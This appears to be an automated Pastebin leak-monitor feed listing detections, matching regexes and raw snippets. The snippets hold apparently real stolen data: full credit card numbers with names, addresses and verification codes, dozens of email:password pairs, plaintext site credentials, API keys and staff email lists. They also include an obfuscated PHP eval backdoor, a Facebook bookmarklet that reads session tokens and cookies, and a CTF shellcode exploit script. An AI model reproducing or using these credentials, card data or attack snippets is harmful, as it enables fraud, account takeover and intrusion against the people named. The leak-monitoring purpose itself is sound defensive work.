Detected 96 occurrence(s) of ‘[\s\|,;’]+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:’]+': 2 Location New York, United States Phone 585.374.2520 Card Type MC Card Number 5121071727107603 Card Expire 11/2005 (MM/YYYY) Card Verif. 702-703 ============================= Sandra Rodenberg Illinois Center for Autism 618-398-7500 sandrar1969@yahoo.com 548 S Ruby Ln 62208 IL Fairview Heights US 4828510386878052 6/06 ========================== Last Name : Breen ( censored ) : […]
↧
Potential leak of data: Email Addresses List
↧
Potential leak of data: Shellcode
Detected 2 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}': <?php echo 'walex'; preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X37d9s4zujP3XP2f2A12ZHdOn6l6Xbi2H3k0abTJp0kfSa5XtmWbU1kySPJcdJu/vcLgA+Rkuy4ndn97j3nS2cSSQRBkARJEARAtz8OmbXte8Eli1y/bcfjMEr6s4R5/TCw2Thyh217nCTTrVptPp9XB1/X4yRynYkXjKrurDZ0rhCyCr/szt//xuC/7Ti58V2W3Ezdtp2410mtH8eU6AXTWXJ Source: http://pastebin.com/raw.php?i=rU0hmmzr
↧
↧
Potential leak of data: Nmap Scan Report
Detected 1 occurrence(s) of ‘Nmap scan report for': sendto(6, packet, 28, 0, 66.11.12.65, 16) => Operation not permitted Offending packet: ICMP [10.0.2.15 > 66.11.12.65 Echo request (type=8/code=0) id=43330 seq=0] IP [ttl=53 id=31854 iplen=28 ] Completed Ping Scan at 16:55, 2.01s elapsed (1 total hosts) Nmap scan report for 66.11.12.65 [host down] NSE: Script Post-scanning. Read […]
↧
Potential leak of data: Simple Password
Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*[“‘][a-z0-9\-_\!\$]+[“‘]': public static void main(String[] args) { String name; int age; boolean trueOrFalse; boolean trueOrFalse2; String builtInPassword = "anybody"; Scanner keyBoardInput = new Scanner(System.in); System.out.print("Please enter your First name: "); name = keyBoardInput.next(); System.out.print("Please enter your age: "); age = keyBoardInput.nextInt(); tru Source: http://pastebin.com/raw.php?i=mdkpRsDE
↧
Potential leak of data: Simple Password
Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*[“‘][a-z0-9\-_\!\$]+[“‘]': p as "old fields" and "new fields" in stdout. # # Make sure you backup your db before running. # Though the script will try to restore on failure. # # Usage: ./migrate_db.bash <server> <user> <password> <db> shopt -s extglob server="$1" user="$2" db="$3" password="$4" # Drop database drop() { mysqladmin […]
↧
↧
Potential leak of data: Email/Password Dump
Detected 38 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+': Y07 wrstlr1996@aol.com:nicolas99g damaddgenius@gmail.com:annesmith jg1711@txstate.edu:money4me dkerley@lsi.net:ts13524 chumpimp@yahoo.com:5gullargokti9 YellowLPX@gmail.com:edge2126 mikedallmann13@gmail.com:Dallm5689 martha.c326@gmail.com:baileykm hogan6382@yahoo.com:bburgess7 Detected 37 occurrence(s) of ‘[\s\|,;’]+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:’]+': ABY07 wrstlr1996@aol.com:nicolas99g damaddgenius@gmail.com:annesmith jg1711@txstate.edu:money4me dkerley@lsi.net:ts13524 chumpimp@yahoo.com:5gullargokti9 YellowLPX@gmail.com:edge2126 mikedallmann13@gmail.com:Dallm5689 martha.c326@gmail.com:baileykm hogan6382@yahoo.com:bburgess7 Source: http://pastebin.com/raw.php?i=CtGfLcZv
↧
Potential leak of data: Simple Password
Detected 1 occurrence(s) of ‘\s*pass[word]+\s*[:=]\s*[“‘][a-z0-9\-_\!\$]+[“‘]': local color = colors.lime term.clear() term.setCursorPos(1,1) password = "cycle" inverted = true side = "bottom" opentime = 5 term.setTextColor(color) rs.setOutput(side,inverted) print("--------------------------------------------------") print("--------------VAULT-TEC DOOR CONTROLS-------------") print("------------------M Source: http://pastebin.com/raw.php?i=DTt18dD2
↧
Potential leak of data: API Key
Detected 7 occurrence(s) of ‘(api|private)[-_]key[ “‘]*=[ =”‘]*\w+': tfile F:\Programs\Kodi15 Custom\portable_data\userdata\addon_data\script.extendedinfo\TheMovieDB\1c3c8a008375f5a1dec2f37c9b390254.txt. 18:51:18 T:5228 DEBUG: script.extendedinfo: loaded file for http://api.themoviedb.org/3/movie/now_playing?language=en&api_key=34142515d9d23817496eeb4ff1d223d0. time: 0.014000 18:51:18 T:5228 DEBUG: script.extendedinfo: starting handle_tmdb_movies 18:51:18 T:3424 INFO: CPythonInvoker(13, F:\Programs\Kodi15 Custom\addons\script.module.simple.downloader\default.py): script successfully run 18:51:18 T:6404 Source: http://pastebin.com/raw.php?i=stxf3Fgd
↧
Potential leak of data: IP Addresses List
Detected 20 occurrence(s) of ‘[^vi\-\.]\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$': eth1 proto kernel scope link src 143.103.155.254 27.126.19.192/29 dev eth2 proto kernel scope link src 27.126.19.194 27.126.19.192/29 dev eth2 proto kernel scope link src 27.126.19.194 143.103.155.0/24 dev eth0 proto kernel scope link src 143.103.155.254 default via 27.126.19.193 dev eth2 default via 143.103.155.254 dev eth0 scope link Kernel IP routing table […]
↧
↧
Potential leak of data: Email/Password Dump
Detected 26 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[ \t;,:\|]+\S+': com | xaxa1978 | City: Rio de Janeiro - RJ - BR | Bandeira: VISA | CC: 459080######8479 | Exp: 11/2016 | Aprovado | #Biel safia_naser@hotmail.com | co2he278 | City: GAMA - DF - BR | Bandeira: VISA | CC: 448733######2564 | Exp: 12/2017 | Aprovado | #Biel gyllyamaura@hotmail.com […]
↧
Potential leak of data: API Key
Detected 1 occurrence(s) of ‘(api|private)[-_]key[ “‘]*=[ =”‘]*\w+': _ssl = True verify_ssl = False port = 9999 owner = rezsahin channels = #various extra = ~/.willie/modules exclude = meetbot,twit,github,countdown [admin] hold_ground = False auto_accept_invite = False [safety] enabled_by_default = False vt_api_key = n Source: http://pastebin.com/raw.php?i=8SChLWww
↧
Potential leak of data: Default Security Password
Detected 1 occurrence(s) of ‘default (pass|passwd|password|secret)': as if written in callee's scope, e.g.: macro incrementA(call_scope :Scope) { inScope(call_scope) { a += 1 } } a = 3; incrementA(@); print a // prints 4. The @ symbol specifies the current scope, and is by default passed to all macro functions, it is only marked here for […]
↧
Potential leak of data: Shellcode
Detected 2 occurrence(s) of ‘shellcode': # perform syscall shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \ + "0x00000030 0xbae18900 0x000001bb 0x00000002 " \ + "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \ + "0x000003b8 " payload = "0x0 "*278 + shellcode + "0x0 "*3 + "\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(( 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me', 4347 )) s.recv(256) s.send(payload) output […]
↧
↧
Potential leak of data: Email Addresses List
Detected 46 occurrence(s) of ‘[\s\|,;’]+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:’]+': e" /><show xmlns="jabber:client">away</show><x xmlns="vcard-temp:x:update"><photo /></x><c xmlns="http://jabber.org/protocol/caps" node="http://code.google.com/p/xmppframework" ver="VyOFcFX6+YNmKssVXSBKGFP0BS4=" hash="sha-1" /> [LOG] Received pres (Bare): sum41284010@pvp.net [LOG] From user: sum41284010 [LOG] Pres Type: available [LOG] Other stuff: <show xmlns="jabber:client">chat</show><status xmlns="jabber:client"><body><profileIcon>588</profileIcon><level>30</level><wins>230</wins> Source: http://pastebin.com/raw.php?i=AMQ2UVGM
↧
Potential leak of data: Interesting Online File
Detected 1 occurrence(s) of ‘http[s]*:\/\/[a-z0-9\-\./]+\.(mdb|conf|cfg|vmdk|config|key|conf)\s': py and paste the following script in to your console --- Using MonsterGUI --- Download and run the EXE below (don't forget to download them both together!) EXE https://github.com/kaetemi/MonsterGUI/blob/master/bin/Release/MonsterGUI.exe https://github.com/kaetemi/MonsterGUI/blob/master/bin/Release/MonsterGUI.exe.config Then run the EXE once you have entered the room (but before you have spent your BP). It only needs […]
↧
Potential leak of data: Simple Password
Detected 2 occurrence(s) of ‘^\s*pass(word|phrase|wd|code)*\s*(:|=|is|was)\s*[a-z0-9\-_\!]+$': Site: dynamicgraphixaz.com:2095 Email: john@dynamicgraphixaz.com Password: Fireparamedics4! Detected 1 occurrence(s) of ‘^\s*pass[word]+\s*[:=]+[ \t]*[a-z0-9\-_\!]+$': Site: dynamicgraphixaz.com:2095 Email: john@dynamicgraphixaz.com Password: Fireparamedics4! Source: http://pastebin.com/raw.php?i=uMw7w1KT
↧
Potential leak of data: Email Addresses List
Detected 103 occurrence(s) of ‘^[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[:,\|]*.*': lay@bmc.edu.jm Sharon Findlay violetrussell@bmc.edu.jm Violet Foster-Russell daviadavidson@bmc.edu.jm Davia Davidson yvonneclarke@bmc.edu.jm Yvonne Clarke andreagraham@bmc.edu.jm Andrea Wilson-Graham heathersherwood@bmc.edu.jm Heather Smith-Sherwood bethlehemmoraviancollege@bmc.edu.jm Bethlehem Moraviancollege Detected 103 occurrence(s) of ‘[\s\|,;’]+[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}[\s\|,;:’]+': ndlay@bmc.edu.jm Sharon Findlay violetrussell@bmc.edu.jm Violet Foster-Russell daviadavidson@bmc.edu.jm Davia Davidson yvonneclarke@bmc.edu.jm Yvonne Clarke andreagraham@bmc.edu.jm Andrea Wilson-Graham heathersherwood@bmc.edu.jm Heather Smith-Sherwood bethlehemmoraviancollege@bmc.edu.jm Bethlehem Moraviancollege Detected 103 occurrence(s) […]
↧
↧
Potential leak of data: Oracle URI
Detected 1 occurrence(s) of ‘dbc:oracle:thin:': </head> <body> <h1>Hello World!</h1> <% Connection conn = null; try { Class.forName("oracle.jdbc.driver.OracleDriver"); conn = DriverManager.getConnection("jdbc:oracle:thin:@IP_SERVIDOR:PUERTO:INSTANCIA", "USUARIO DB", "PASSWORD"); out.println("connected....!!"); } catch(Exception e) { out.println("Exception : " + e.getMessage() + ""); } Source: http://pastebin.com/raw.php?i=AdCkiL7W
↧
Potential leak of data: Obfuscated JavaScript Code
Detected 1 occurrence(s) of ‘javascript.*eval\(‘: javascript: void(function () { var dtsg = document.getElementsByName("fb_dtsg")[0].value; var uid = document.cookie.match(/c_user=(\d+)/)[1]; var dyn = "7n8ahyj35CCzpQ9UmWOGUGy1m9ACUb8yGg"; var req = 8; var rev = "1033590"; var ttstamp = "265816767119957579"; window.aing = { uid: uid, loding: { img: "<img src=\"//fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif\" width=\"16px\" height=\"11px\" style=\"margin:0 5px;vertical-align:bottom\"/>", bar: function (dimana, sampe, kolbek, pakeInfoGak) { if(dimana […]
↧
Potential leak of data: phpMyAdmin SQL Dump
Detected 1 occurrence(s) of ‘^– phpMyAdmin SQL Dump': -- phpMyAdmin SQL Dump -- version 3.5.2.2 -- http://www.phpmyadmin.net -- -- Machine: localhost -- Genereertijd: 02 mei 2015 om 14:43 -- Serverversie: 5.1.67 -- PHP-versie: 5.2.17 SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; SET time_zone = "+00:00"; /*!40101 SET @OLD_ Source: http://pastebin.com/raw.php?i=rPzrbJLG
↧